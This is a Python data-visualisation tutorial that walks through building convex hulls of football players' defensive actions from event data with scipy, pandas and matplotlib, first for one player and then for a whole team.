So, set the stdout *for the stty command* to the "arbitrary serial port." Eg, if dig_tty is set to the name of the port the digitizer is on (like /dev/ttya), then try "(stty -icrnl > $dig_tty)" where the parentheses mean execute in a subshell. You could also try
exec > $dig_tty stty -icrnl exec >/dev/tty
or
echo "stty -icrnl" | sh >$dig_tty.
mike
Michael Fischbein, Dir. of Security Services, Fusion Systems Group. 24th Floor, 225 Broadway, New York, NY 1007 msf@fsg.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The usual trick is something like:
(stty -icrnl; sleep 1000000) > /dev/ttya
Modify as needed...
- Matt Goheen
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Try using "stty -opost" when accessing the serial ports. This will prevent the line-feed to line-feed carrage-return convertion. Jeff Martin Aurora Technologies jeff@auratek.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The stty command in 4.1.x operates on stdout and prints information to stderr. Therefore, if you want to manipulate another port using stty, you can use something like
% stty erase ^R >/dev/ttyp2
Note that the change will only last for the current session, so once the tty is closed, it will revert to the default. Withing shell scripts, people usually do something like "sleep 1000000 </dev/ttyp2" in the background to keep the tty open, then kill that when they are done.
Also note that you can only do this if you have the necessary permissions for the /dev/tty* device.
Daniel Trinkle trinkle@cs.purdue.edu Dept. of Computer Sciences {backbone}!purdue!trinkle Purdue University 317-494-7844 West Lafayette, IN 47907-1398
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This archive was generated by hypermail 2.1.2 : Fri Sep 28 2001 - 23:06:54 CDT
|
http://www.sunmanagers.org/archives/1992/1602.html
|
CC-MAIN-2016-07
|
refinedweb
| 2,860
| 62.58
|
This is the mail archive of the elfutils-devel@sourceware.org mailing list for the elfutils project.
On Mon, 2014-12-15 at 13:48 -0800, Josh Stone wrote: > On 12/13/2014 03:18 PM, Mark Wielaard wrote: > > On Thu, Dec 11, 2014 at 05:34:06PM -0800, Josh Stone wrote: > >> It might be worth auditing other qsort/tsearch comparison functions for > >> similar wrapping possibilities. > > > > I think you are right. I looked over all compare functions and two didn't > > do as you suggest. The attached patch fixes those. Do that look correct? > > Those look good. Thanks, pushed. >. Proposed fix attached. Thanks, Mark
From 6c8781d9175900e321a8afe2c5073db68872e8e0 Mon Sep 17 00:00:00 2001 From: Mark Wielaard <mjw@redhat.com> Date: Tue, 16 Dec 2014 11:04:55 +0100 Subject: [PATCH] elfcmp: Make sure Elf32_Word difference doesn't wrap around in int compare. Signed-off-by: Mark Wielaard <mjw@redhat.com> --- src/ChangeLog | 5 +++++ src/elfcmp.c | 3 +-- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/src/ChangeLog b/src/ChangeLog index 141b31f..1e612bf 100644 --- a/src/ChangeLog +++ b/src/ChangeLog @@ -1,3 +1,8 @@ +2014-12-16 Mark Wielaard <mjw@redhat.com> + + * elfcmp.c (compare_Elf32_Word): Make sure (unsigned) Elf32_Word + difference doesn't wrap around before returning as int. + 2014-12-11 Mark Wielaard <mjw@redhat.com> * readelf.c (print_debug_exception_table): Check TType base offset diff --git a/src/elfcmp.c b/src/elfcmp.c index c420019..d1008b3 100644 --- a/src/elfcmp.c +++ b/src/elfcmp.c @@ -811,8 +811,7 @@ compare_Elf32_Word (const void *p1, const void *p2) { const Elf32_Word *w1 = p1; const Elf32_Word *w2 = p2; - assert (sizeof (int) >= sizeof (*w1)); - return (int) *w1 - (int) *w2; + return *w1 < *w2 ? -1 : *w1 > *w2 ? 1 : 0; } static int -- 1.8.3.1
|
https://sourceware.org/ml/elfutils-devel/imported/msg04382.html
|
CC-MAIN-2018-17
|
refinedweb
| 290
| 70.09
|
Java - String getChars() Method
The Java string getChars() method is used to copy characters from this string into the destination character array.: dstBegin + (srcEnd-srcBegin) - 1.
Syntax
public void getChars(int srcBegin, int srcEnd, char[] dst, int dstBegin)
Parameters
Return Value
void type.
Exception
throws IndexOutOfBoundsException, if any of the following is true:
- srcBegin is negative.
- srcBegin is greater than srcEnd.
- srcEnd is greater than the length of this string.
- dstBegin is negative.
- dstBegin+(srcEnd-srcBegin) is larger than dst.length.
Example:
In the example below, getChars() method is used to copy characters from the given string called MyStr into the given character array called MyArr.
public class MyClass { public static void main(String[] args) { String MyStr = "Hello World!"; char MyArr[] = new char[20]; //copy characters from Mystr into MyArr MyStr.getChars(0, 12, MyArr, 0); //print the content of char array System.out.print("MyArr contains:"); for(char c: MyArr) System.out.print(" " + c); } }
The output of the above code will be:
MyArr contains: H e l l o W o r l d !
❮ Java String Methods
|
https://www.alphacodingskills.com/java/note/java-string-getchars.php
|
CC-MAIN-2021-31
|
refinedweb
| 178
| 60.41
|
After.
AjaxPanel
Update - 12 Nov 2005: The MagicAjax framework is now hosted on SourceForge. Many improvements and features have been added since the initial release, including support for ASP.NET 2.0.
This article assumes that you know what AJAX is. If that's not the case, there are plenty of good articles in CodeProject to get you started. The code behind this article is based on the excellent series AJAX WAS Here by Bill Pierce. Understanding the client JavaScript framework and how it invokes server methods is not required to use the classes in this article, but if you want to see what happens "under the hood", I strongly recommend reading Bill Pierce's articles.
I have included a demo project to show you how to convert the existing plain postback controls to AJAX-like ones.
This page tries to be a chat application. I will not get into the details of how it works; it was created just for demonstration purposes. It uses the standard ASP.NET controls, no mystery here. The buttons cause a postback to the server and the page reloads and fills the controls with the new data.
This page uses the same controls but it works quite differently. The controls are refreshed instantly and without any reloading by the browser. That's right, AJAX is here.
There are four steps required to convert BubisChat.aspx to AjaxBubisChat.aspx (or to apply AJAX to any page using this framework):
public class AjaxBubisChat : Ajax.AjaxPage
Inheriting from AjaxPage is not required; it just handles the callback event and provides some useful properties for convenience. To handle the callback event in a page that inherits from AjaxPage, you override the OnCallBack method:
AjaxPage
OnCallBack
protected override void OnCallBack(EventArgs e)
{
// Refreshes the sessionID in the cache
PutSessionIDInCache();
txtMsg.Text = chatData.msgText.ToString();
ShowNames();
base.OnCallBack (e);
}
If the page doesn't inherit from AjaxPage, it can handle the callback event by implementing the ICallBackEventHandler interface:
ICallBackEventHandler
public interface ICallBackEventHandler
{
void RaiseCallBackEvent();
}
The callback is like a postback but without the reloading of the page by the browser. I'll explain what the callback does a little later. For reasons that will become clear later, the Load event of the page and its controls are not raised during a callback. You must use the callback event instead.
During a callback, the HttpContext of the page is invalid, so you can't use the Request/Response properties of System.Web.UI.Page, you have to use the CallBackHelper.Request and CallBackHelper.Response properties instead. The AjaxPage provides valid Request/Response properties so that you don't have to replace them in your code for the ones from CallBackHelper.
HttpContext
Request
Response
System.Web.UI.Page
CallBackHelper.Request
CallBackHelper.Response
CallBackHelper
It can be one AjaxPanel for each TextBox and ListBox, or one AjaxPanel for all of them. The buttons should be inside an AjaxPanel, so that their submit function is replaced automatically for a callback function. In this example, I just put all the controls inside one AjaxPanel for convenience.
TextBox
ListBox
Put:
<httpModules>
<add name="AjaxHttpModule" type="Ajax.AjaxHttpModule, Ajax" />
</httpModules>
at the <system.web> section, and:
<system.web>
<!-- If CallBackScriptPath is not set in the appSettings,
"/ajax/script" is used-->
<add key="CallBackScriptPath" value="/ajax/script" />
at the <appSettings> section of the web.config file.
<appSettings>
The AjaxHttpModule processes the callback at the AcquireRequestState event of the HttpApplication, after the request has been authenticated. The default script path is valid if you extract the source files to the wwwroot path. If you extract them to another directory, you should change the CallBackScriptPath of the application settings accordingly.
AjaxHttpModule
AcquireRequestState
HttpApplication
CallBackScriptPath
// For automatic CallBack every 3 seconds.
CallBackHelper.SetCallBackTimerInterval(3000);
This is required so that the chat textbox is automatically refreshed if there are new messages to display. Most pages don't need automatic refresh, so just ignore this if that's the case.
And believe it or not, that was all! No JavaScript and no replacement of the controls were necessary. You can add new controls to the AjaxPanel either by code or by using the Visual Studio Designer.
The job of the callback is to invoke server-side control events (and a special CallBackTimer event if it is enabled). For more details, I suggest reading Bill Pierce's articles that I have mentioned in the Background section. When the server receives a callback, it returns generic JavaScript code. The client doesn't care what the JavaScript does (populating a ListBox, invoking an alert box, whatever), it just executes them. Thus, contrary to the usual mentality of AJAX applications, it's up to the server to manipulate the page using JavaScript, not the client. That way, instead of trying to embed JavaScript code in the web page and synchronize it with the server code, the focus is shifted on implementing all the functionality of a custom control on the server side without having to separate the code to the JavaScript part, and to the C# (VB.NET, whatever) part.
CallBackTimer
Now, it is getting more interesting... A page that is AJAX-enabled is stored as a session state variable. When a callback is invoked, the AjaxHttpModule intercepts it, finds the originating page from the session and invokes the appropriate events for the controls of the page without reloading the original page.
In order for a page to be stored in the session, it must contain at least one AjaxControl control (base class of AjaxPanel). The session key that is used is the URL of the originating page so that different pages can be distinguished from one another.
AjaxControl
The callback doesn't have to come from a control contained inside an AjaxPanel, it can be invoked from any control on the page, as long as it is properly configured to call the appropriate callback function, like this:
Button btnSend = new Button();
btnSend.Attributes.Add ("onclick",
CallBackHelper.GetCallbackEventReference(btnSend) +
" return false;");
The CallBackHelper.GetCallbackEventReference method provides the AJAXCbo.DoPostCallBack call on the client side, and return false; is added so that the OnClick event can override the submit function.
CallBackHelper.GetCallbackEventReference
AJAXCbo.DoPostCallBack
return false;
OnClick
The AjaxPanel, by default, automatically configures all the submit buttons that it contains to call the callback function and replaces the __doPostBack calls of normal postback with a AJAXCbo.DoPostCallBack call. If you want to manually set the OnClick event of your controls, set the SetCallBackForSubmitButtons and SetCallBackForChildPostBack properties of AjaxPanel to false.
__doPostBack
SetCallBackForSubmitButtons
SetCallBackForChildPostBack
false
The task of AjaxPanel is to reflect its contents on the browser of the client each time a callback is invoked. To accomplish this, it scans the controls that it contains and produces the appropriate JavaScript code for every control that is added, removed, or altered, ignoring the controls that haven't changed at all. In order to spot changes, it renders each control and checks if the produced HTML is different from the one obtained during the previous callback.
In addition, if the AjaxPanel encounters any RenderedByScriptControl controls (AjaxPanel inherits from this class), it ignores them and lets them take care of their "reflection" to the browser. Thus, if an AjaxPanel (parent) contains another AjaxPanel (child), and a control of the child-AjaxPanel is altered, the parent-AjaxPanel won't send the entire HTML rendering of the child-AjaxPanel, but instead the child-AjaxPanel will send just the HTML of the altered control. That way, the size of the JavaScript code that the client gets as a response of a callback, is greatly reduced.
RenderedByScriptControl
The known limitations are:
ajaxPanel.Attributes["attrib"] = "";
instead.
XmlHttp
InProc
SQLServer
StateServer
I'm not going to get into the details of the inner workings of the classes. I have tried to document every method, so anyone wanting to extend the AJAX controls that are provided, I strongly recommend reading the comments of all the methods and the classes. For the rest who just want to use the framework:
public
AjaxLinkButton
CallBackHelper.Write
AjaxUserControl
Panel
Response.Redirect
Server.Transfer
CallBackHelper.End
Response.End
Load
AjaxPanel handles the "Browser Back Button" problem as well. The "Browser Back Button" problem is that by pressing the Back button, the browser loads the HTML page by its cache, so any AJAX changes made to the page are lost, while the user still expects to see the same page that he was viewing before.
To solve this, I have put in the page a JavaScript function that executes every time the page is loaded and a hidden field that is empty. The function checks this hidden field, and if it's empty, it assumes that the page was loaded by a request to the server (i.e. by the Refresh button) and sets the value of the field. If the function finds that the field is not empty, it assumes that the browser loaded the page by the Back button (the value of the fields are then restored) and invokes a special callback (CallBackStartup) on the server. When the CallBackStartup event is raised, AjaxPanel renders all of its children on the client page, thus restoring the previous page that the user was viewing.
CallBackStartup
I hope you find this framework useful. I encourage you to experiment with it, and if some fancy, jaws-dropping, eyes-bleeding, amazing control comes out of it, please share it with us.
AjaxHttpHandler
CallBackHelper.Redirect
CheckBox
Visible
RadioButtonList
CheckBoxList
This article, along with any associated source code and files, is licensed under The MIT License
General News Suggestion Question Bug Answer Joke Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
|
http://www.codeproject.com/Articles/11655/Magic-AJAX-Applying-AJAX-to-your-existing-Web-Page?fid=216309&df=90&mpp=25&sort=Position&spc=Relaxed&select=1313380&tid=1294693
|
CC-MAIN-2015-14
|
refinedweb
| 1,616
| 53.61
|
Basetypes, Collections, Diagnostics, IO, RegEx...
I see a lot of complaints about counters in the Logical Disk/Physical Disk categories always returning zero when you try to read them. Specifically, using PerformanceCounter.NextValue with these counters always returns zero:
% Disk Read Time % Disk Write Time % Idle Time % Disk Time Avg. Disk Queue Length Avg. Disk Read Queue Length Avg. Disk Write Queue Length
Two things happen when you call NextValue. First, we read the raw value of the performance counter. Second, we do some calculations on the raw value based on the counter type that the counter says it is. If the calculated value is always zero, either we failed to read the counter or we failed to calculate it properly. If we failed to read, well, you're out of luck and there's probably no way to work around the problem. But if we failed to calculate it properly, then you have the option of doing the calculation yourself.
For the "% ..." counters, unfortunately the bug is in the first step of reading the counters, so doing the calculations yourself won't help. However, the "Avg Disk ..." simply have bugs in their calculations, and I'm going to walk through the process of doing the calculations manually.
First, you need to find the counter type. The first thing I found was that the Avg counters are of type PERF_COUNTER_LARGE_QUEUELEN_TYPE: after some trial and error, I discovered that they are actually PERF_COUNTER_100NS_QUEUELEN_TYPE:
The next step is to figure out what the calculation for PERF_COUNTER_100NS_QUEUELEN_TYPE is. A quick MSDN search yields, which tells us that the calculation looks like (X1-X0)/(Y1-Y0), where X is the counter data and Y is the 100ns Time.
Now we can finally implement the calculation ourselves:
public static double Calculate100NsQueuelen(CounterSample oldSample, CounterSample newSample) { ulong n = (ulong) newSample.RawValue - (ulong) oldSample.RawValue; ulong d = (ulong) newSample.TimeStamp100nSec - (ulong) oldSample.TimeStamp100nSec; return ((double) n) / ((double)d); }
This process is somewhat of a pain, as documentation is not always good and it can be difficult to figure out which values to use in the calculations. But if you compare your results to what perfmon reports and keeping trying, you can get it eventually.
|
http://blogs.msdn.com/bclteam/archive/2005/03/15/395986.aspx
|
crawl-002
|
refinedweb
| 367
| 56.55
|
Caller Details.
How do we use them?
Their use is simple. They’re applied to optional method parameters. That’s it. At compile time the compiler takes over and automatically resolves the correct value and passes it at the point of invocation.
void Method(
[CallerMemberName] string callerName = ""
,[CallerLineNumber] int lineNumber = -1
,[CallerFilePathAttribute] string filePath = ""
)
Getting trace data
Trace data. We all need it. How we get it is the issue. When logging an execution trace we usually need caller details, parent types, line numbers, etc. For most of us reflection is the go to solution. It’s much more dynamic and flexible than hard coding values and is easier to maintain in the long run.
You’ve probably seen or written a trace method like
void Trace(string message, string methodName)
{
Trace.Write(string.Format("{0}: {1}", methodName, message));
}
And then invoked it using a hard coded value for the method name or using reflection
Trace("Executing", "MyMethod");
Trace("Executing", System.Reflection.MethodBase.GetCurrentMethod().Name);
Or maybe you’ve written some more common like the following
void Trace(string message)
{
StackTrace stackTrace = new StackTrace();
StackFrame lastFrame = stackTrace.GetFrame(1);
string methodName = lastFrame.GetMethod().Name;
Trace.Write(string.Format("{0}: {1}", methodName, message));
}
which uses reflection via StackTrace to get the details of the caller. But with the new attributes, we have another option of writing that same method
void Trace(string message, [CallerMemberName] string methodName = "")
{
Trace.Write(string.Format("{0}: {1}", methodName, message));
}
We can invoke this version with just our trace message.
Trace("Executing");
At compile time the compiler will auto populate the methodName parameter with a value equal to the calling method’s name. If you look at the IL you can see exactly what it’s doing.
.method private hidebysig
instance void MyMethod () cil managed
{
// Method begins at RVA 0x206f
// Code size 17 (0x11)
.maxstack 8
IL_0000: ldarg.0
IL_0001: ldstr "Executing"
IL_0006: ldstr "MyMethod"
IL_000b: call instance void ConsoleApplication1.Program::Trace(string, string)
IL_0010: ret
} // end of method Program::MyMethod
The compiler is loading the string “MyMethod” as a parameter for the call to the Trace method.
Do we really need another solution?
If we have a solution, and it’s been working for us for so long why the need for something else? Good question! Reflection is not known for performance. To get something as simple as the calling method’s name or line number, reflection is the proverbial sledge hammer.
There is also another issue that you might not think about initially until it bites you. When the assembly goes through obfuscation, the method names will become a cryptic mess of characters. Suddenly, “MyMethod” becomes “xEdjf3d7ldk” so when you go to look at your trace log you’ll see,
xEdjf3d7ldk: Executing
il2dur8dcpw: Executing
kf1ur8ldk83: Executing
Mapping this method name back to the original method would require some work.
The compiler will handle the attributes at compile time and obfuscation doesn’t occur until after the assembly is compiled. This means the information you get from the attributes will match what you have in your source code.
Using attributes where possible cleans up the code and makes it easier to read. When developers look at it, they won’t have to decrypt any reflection code to figure it out its intended purpose is.
Additionally, the attributes work the same in Release mode as they do in Debug mode and don’t need PDBs.
Not quite there yet
While these new attributes are handy, the information they provide is limited. We only get the three attributes for caller name, line number and file path. Since most of us would not add a trace method to every class we build, just having the method name isn’t always going to be enough detail to be useful, but we don’t get access to the containing type, method parameters or any of the other information that we could easily get using reflection. But this is a good first step.
Other uses
Are there other uses for these attributes beyond tracing and debugging? There are! My favorite use is when implementing the INotifyPropertyChanged interface which requires magic strings for passing the property names.
If you’ve seen my blog or been to my code camp sessions, you may have seen that I have many alternatives for implementing INotifyPropertyChanged including using aspects (Aspect Oriented Programming), and a T4 template (code generation). Anything that makes implementing this interface easier is awesome in my book.
public class DataModel : INotifyPropertyChanged
{
private int _myProperty;
public int MyProperty
{
get { return _myProperty; }
set { _myProperty = value; OnPropertyChanged("MyProperty"); }
}
public event PropertyChangedEventHandler PropertyChanged;
protected void OnPropertyChanged(string propertyName)
{
if (PropertyChanged != null)
{
PropertyChanged.Invoke(this, new PropertyChangedEventArgs(propertyName));
}
}
}
Not only do we have to write all of that boiler plate code in the property setter, but we have to maintain it too! I don’t think I need to tell you about the problems with magic strings. This is also prone to error with obfuscation (yes, I know you wouldn’t obfuscate a model you’re binding to).
With a quick change, we can avoid having to deal with magic strings.
public class DataModel : INotifyPropertyChanged
{
private int _myProperty;
public int MyProperty
{
get { return _myProperty; }
set { _myProperty = value; OnPropertyChanged(); }
}
public event PropertyChangedEventHandler PropertyChanged;
protected void OnPropertyChanged([CallerMemberName] string propertyName = "")
{
if (PropertyChanged != null)
{
PropertyChanged.Invoke(this, new PropertyChangedEventArgs(propertyName));
}
}
}
The CallerMemberNameAttribute works with not only methods, but properties and events too. This lets us update the INotifyPropertyChanged implementation to make use of the CallerMemberNameAttribute to provide the name of the changed property to the OnPropertyChanged method.
Conclusion
As an advocate of Aspect Oriented Programming and meta programming, I’m happy to see more native features move us closer to those methodologies. I’m not sure where Microsoft is headed with these types of features, but I feel that we could have gotten more from this release. I believe it’s going in the right direction and I’m excited to see how this grows. Maybe a way for developers to provide their own compile time transformations?
For more details, see the MSDN article:
About the author
Dustin can be found on the road less traveled, avoiding what's popular. He's a co-host on the
MashThis.IO podcast, and a contributor to Pluralsight. He regularly attends user
groups, code camps and other developer events to speak about aspect oriented
programming and a range of other topics. When he isn't working or speaking at
events, he is preparing for his next project or speaking engagement.
|
https://docs.microsoft.com/en-us/archive/blogs/mvpawardprogram/caller-details
|
CC-MAIN-2020-34
|
refinedweb
| 1,085
| 54.22
|
Hybrid Connections offer an easy way to connect your Web App to an on-premise resource. In most cases, Hybrid Connections just work, but when they don't, the only info you might have to go on is a failure in your app or a status of "Not connected" in the Azure portal or the Hybrid Connection Manager. In this post, I'll tell you how you can get some diagnostic information from a couple of different logging methods.
Note: The information in this post applies to both Azure Relay Hybrid Connections and to Classic Hybrid Connections.
Service Bus Operational Logs
Service Bus Operational logs are available on the machine running the Hybrid Connection Manager. You don't have to do anything special to enable logging. Simply open the Event Viewer in Windows and navigate to them. You'll find them under Application and Service Logs/Microsoft/ServiceBus/Client as shown in the figure below.
Service Bus Operational Logs (Click for a larger image.)
The problem in the figure above is that the Hybrid Connection called mysql doesn't actually exist in Azure. It used to, but it has been deleted. Therefore, the Hybrid Connection Manager encounters an error when attempting to connect to it.
The Service Bus Operational logs aren't going to provide you with a silver bullet to diagnose a Hybrid Connection issue, but if you do a little investigative work with the data they provide, you'll usually find the source of your problem. Keep in mind that some of the entries might be classified as informational. Most of those can be safely ignored.
System.Net Tracing
The Hybrid Connection Manager uses the .NET Framework for connectivity with Service Bus. Therefore, you can enable logging for the System.Net namespace in order to get information on what might be causing a problem with your Hybrid Connection. System.Net tracing is usually a better choice when your Hybrid Connection is showing "Connected" but your app is failing.
To enable System.Net tracing, follow these steps on the machine that is running the Hybrid Connection Manager.
- Launch Notepad or another text editing application. You'll need to run this app as an administrator so that you can edit the Hybrid Connection Manager's configuration file.
- Open the file called Microsoft.HybridConnectionManager.Listener.exe.config located in the folder where the Hybrid Connection Manager is installed. (By default, this folder is Program Files\Microsoft\HybridConnectionManager [version].)
- Add the following code before the closing </configuration> element in the file.
:\temp>
- Restart the Azure Hybrid Connection Manager Service in Services as shown in the figure below.
Note: Make sure that you have a temp folder at the root of your C drive. If you don't, create one so that the trace log can be written to that folder.
After you do this, System.Net logs will be saved to c:\temp\ and the filename will be System.Net.trace.log. The code you added enables verbose logging, so there will be a LOT of information in the log. If you are having difficulty locating a problem in the log, you can search for exception to see if there are any exceptions occurring. Microsoft support staff can also assist you with interpreting the log if you open a support case.
Important note: Once you generate your log, you should remove the code you added to the config file and restart the Azure Hybrid Connection Manager Service again. If you don't, the System.Net log will continue to grow and it will use a lot of disk space.
Hopefully these logging options will make it easier for you to troubleshoot your Hybrid Connections.
|
https://blogs.msdn.microsoft.com/waws/2017/06/26/troubleshooting-hybrid-connections-with-logging/
|
CC-MAIN-2018-26
|
refinedweb
| 612
| 56.76
|
>>>>> "Frank" ===10, dt=0.01):
self.ax = ax
self.canvas = ax.figure.canvas
self.dt = dt
self.maxt = maxt
self.tdata = [0]
self.ydata = [0]
self.line = Line2D(self.tdata, self.ydata, animated=True)
self.ax.add_line(self.line)
self.background = None
self.canvas.mpl_connect('draw_event', self.update_background)
self.ax.set_ylim(-.1, 1.1)
self.ax.set_xlim(0, self.maxt)
def update_background(self, event):
self.background = self.canvas.copy_from_bbox(self.ax.bbox)
def emitter(self, p=0.01):
'return a random value with probability p, else 0'
v = nx.mlab.rand(1)
if v>p: return 0.
else: return nx.mlab.rand(1)
def update(self, *args):
if self.background is None: return True
y = self.emitter()
lastt = self.tdata[-1]
if lastt>self.tdata[0]+self.maxt: # reset the arrays
self.tdata = [self.tdata[-1]]
self.ydata = [self.ydata[-1]]
self.ax.set_xlim(self.tdata[0], self.tdata[0]+self.maxt)
self.ax.figure.canvas.draw()
self.canvas.restore_region(self.background)
t = self.tdata[-1] + self.dt
self.tdata.append(t)
self.ydata.append(y)
self.line.set_data(self.tdata, self.ydata)
self.ax.draw_artist(self.line)
self.canvas.blit(self.ax.bbox)
return True
from pylab import figure, show
fig = figure()
ax = fig.add_subplot(111)
scope = Scope(ax)
gobject.idle_add(scope.update)
show()
Hello
On Wed, 2005-08-31 at 08:15 +0200, Sascha GL wrote:
> >.
I posted this to the list a few days ago:
Using the agg backend you can obtain an RGBA buffer or RGB string which
can then be loaded as a PIL Image for processing. I've adapted a the
examples/agg_oo.py to demonstrate.
----
from matplotlib.backends.backend_agg \
import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
import Image
fig = Figure()
canvas = FigureCanvas(fig)
ax = fig.add_subplot(111)
ax.plot([1,2,3])
ax.set_title('hi mom')
ax.grid(True)
ax.set_xlabel('time')
ax.set_ylabel('volts')
canvas.draw()
size = canvas.get_width_height()
usebuffer = True
if usebuffer:
# Load the agg buffer directly as the source of the PIL image
# - could be less stable as agg and PIL share memory.
buf = canvas.buffer_rgba()
im = Image.frombuffer('RGBA', size, buf, 'raw', 'RGBA', 0, 1)
else:
# Save the agg buffer to a string and load this into the PIL image.
buf = canvas.tostring_rgb()
im = Image.fromstring('RGB', size, buf, 'raw', 'RGB', 0, 1)
im.show()
----
If you are using a recent CVS version of mpl you will need to change
buffer_rgba() to buffer_rgba(0,0).
Nick
>.
Sascha
--
5 GB Mailbox, 50 FreeSMS
+++ GMX - die erste Adresse für Mail, Message, More +++
>>>>> "Sascha" == Sascha <saschagl@...> writes:
Sascha> I am writing a web server app that creates charts among
Sascha> other things. I am trying to get rid of the temporary file
Sascha> that I use to transmit the figures created with matplotlib
Sascha> to the actual web server. Although print_figure says "If
Sascha> filename is a fileobject, write png to file object (thus
Sascha> you can, for example, write the png to stdout)" I can't
Sascha> successfully write anything to stdout. Anyone knows an
Sascha> example or can give me some hint what I can do to get rid
Sascha> of the tempfile?
Short answer: no known way to do this currently, though we'd like to
figure it out. As far as I know (and could very well be wrong)
libpng requires a FILE*, which StringIO and cStringIO do not provide.
JDH
Hi!
Indeed, I misunderstood documentation and installed only one package
from two (Numeric and numarray). After installation of Numeric and
devels for tcl and tk installation went smoothly.
Thank you
Alex Schwarzenberg-Czerny
On
Tue, 30 Aug 2005, Fernando Perez wrote:
> Aleksander Schwarzenberg-Czerny wrote:
>
> > src/_transforms.cpp:8:34: Numeric/arrayobject.h: No such file or directory
>
> > Do I miss some required package?
>
> First, check whether you actually have numeric installed:
>
> planck[python]> python -c 'import Numeric;print Numeric.__version__'
> 23.7
>
> If that works, it means that you have installed the Numeric headers in some
> non-standard location. On my system, they live in:
>
> planck[python]> locate arrayobject.h
> /usr/include/python2.3/Numeric/arrayobject.h
>
>
> I believe by default, distutils adds automatically /path/to/include/python to
> the include file search path (via -I), but if you've installed Numeric in some
> non-standard location, that automatic search may fail. I don't see
> immediately a way to tell distutils to add specific extra paths, but there may
> be one. The cheap fix is to copy the Numeric/*.h directory over to the
> standard python location for headers in your system.
>
> Cheers,
>
> f
>
|
https://sourceforge.net/p/matplotlib/mailman/matplotlib-users/?viewmonth=200508&viewday=31
|
CC-MAIN-2018-13
|
refinedweb
| 761
| 51.85
|
Building on what you can do with event data from the Opta (or any other) event feed, we’re going to look at one way of visualising a team’s defensive actions. Popularised in the football analytics community by Thom Lawrence (please let us know if we should add anyone else!), convex hulls display the smallest area needed to cover a set of points:
Been a while since I did some of these, but behold: #USMNT 0-2 Colombia. US asking for trouble on their left. pic.twitter.com/JnpqlnkelR
— Thom Lawrence ðŸ‹ðŸ‘€ (@lemonwatcher) June 8, 2016
In this tutorial, we’re going to go through selecting and preparing our data to create these, before plotting the hull. We’ll then apply this to a for loop to chart each player together to see where a team is being forced to defend.
For this article, we’ll be making use of the ConvexHull tools within the Scipy module. The wider module is a phenomenal resource for more complex maths needs in Python, so give it a look if you’re interested.
Outside of ConvexHull, we’ll need pandas and numpy for importing and manipulating data, while Matplotlib will plot our data. Let’s import them and get started:
from scipy.spatial import ConvexHull import pandas as pd import numpy as np import matplotlib.pyplot as plt from matplotlib.patches import Arc %matplotlib inline
With the modules ready, we’re going to import our data. For this example, our data contains all defensive actions in one match, split by player and team.
Let’s take a look at how it is structured with .head():
defdata = pd.read_csv("def_table.csv") defdata.head()
So each row is a defensive action, and we can see the x/y coordinates and who did it.
We just want one player’s actions, so we’ll create a new dataframe for the first player ID – 50471:
player50471 = defdata.loc[(defdata['player'] == 50471)] player50471.head()…
Thanks to the pandas module, this is made easy by adding .values to the end of the data that we want to see in arrays, rather than columns:
defpoints = player50471[['x', 'y']].values defpoints
array([[38.9, 31.8], [30. , 33.2], [64.7, 94.9], [31.2, 32.2], [46.5, 22.6], [30.3, 49.8], [22.9, 92.5]])
Our data is now ready to be used to create our convex hull. By itself, it is actually pretty boring – it simply creates an object that does nothing at all by itself. Let’s see how this is done below:
#Create a convex hull object and assign it to the variable hull hull = ConvexHull(player50471[['x','y']]) #Display hull hull
<scipy.spatial.qhull.ConvexHull at 0x1faa0c96dd8>
See, that is pretty boring. But we can make it so much cooler when we plot the hull onto a chart.
Let’s start by plotting all 7 event locations as dots on a scatter chart:
#Plot the X & Y location with dots plt.plot(player50471.x,player50471.y, 'o')
[<matplotlib.lines.Line2D at 0x1faa2d10908>]
Next up, we’re going to add lines around the most extreme parts of the plot. These most extreme parts are stored in a part of the hull object called simplices. We can just use a for loop to iterate through the simplices and draw lines between them:
-')
Looks kind of abstract, but a lot more interesting than the hull object on its own!
Let’s just add in some shading to make our area even clearer. We’ll also make it 30% transparent with the alpha argument:
-') #Fill the area within the lines that we have drawn plt.fill(defpoints[hull.vertices,0], defpoints[hull.vertices,1], 'k', alpha=0.3)
[<matplotlib.patches.Polygon at 0x1faa2f1bb70>]
Perfect, we have one player’s zone of defensive actions plotted. We don’t have a pitch or any other players on there yet, but this is great work!
Let’s work on a bigger project now – let’s do all of this over and over for a whole team. We’ll take a single team out of our dataset, then use for loops to create the plot for each player (exactly as above) before plotting them together.
First up, let’s extract Team B into one dataframe:
TeamB = defdata.loc[(defdata.team == "Team B")] TeamB.head()
Perfect, just as before, but with different players on a single team.
We’ll now need to go through each player and do exactly what we did to plot just a single player. First up, we need to find out who we are dealing with. We can use .unique() to pool each individual into the variable ‘players’:
players = TeamB["player"].unique() players
array([42593, 17476, 57112, 27789, 14664, 61366, 37748, 57001, 28554, 17740], dtype=int64)
Every player now just needs to go into a for loop, where we’ll do exactly what we did before to get a plot. We’ll create a temporary dataframe for each player, create a hull from the x/y coordinates, then plot the lines and fill in the shape with a transparent colour. Let’s take a look with the help of some comments:
#For each player in our players variable for player in players: #Create a new dataframe for the player df = TeamB[(TeamB.player == player)] #Create an array of the x/y coordinate groups points = df[['x', 'y']].values #If there are enough points for a hull, create it. If there's an error, forget about it try: hull = ConvexHull(df[['x','y']]) except: pass #If we created the hull, draw the lines and fill with 5% transparent red. If there's an error, forget about it try: for simplex in hull.simplices: plt.plot(points[simplex, 0], points[simplex, 1], 'k-') plt.fill(points[hull.vertices,0], points[hull.vertices,1], 'red', alpha=0.05) except: pass #Once all of the individual hulls have been created, plot them together plt.show()
Fantastic work! We now have all of the players with enough data points on the chart. The transparency is a nice touch, as we can see any hidden players and where any crossover happens.
Our plot leaves out any players with less than 2 defensive actions in the data, so you may want to plot these as lines or dots. If so, you should be able to figure out how to do this from the code already, or from our other visualisation tutorials.
As for next steps, you might want to plot this on a pitch (pitch drawing tutorial here):
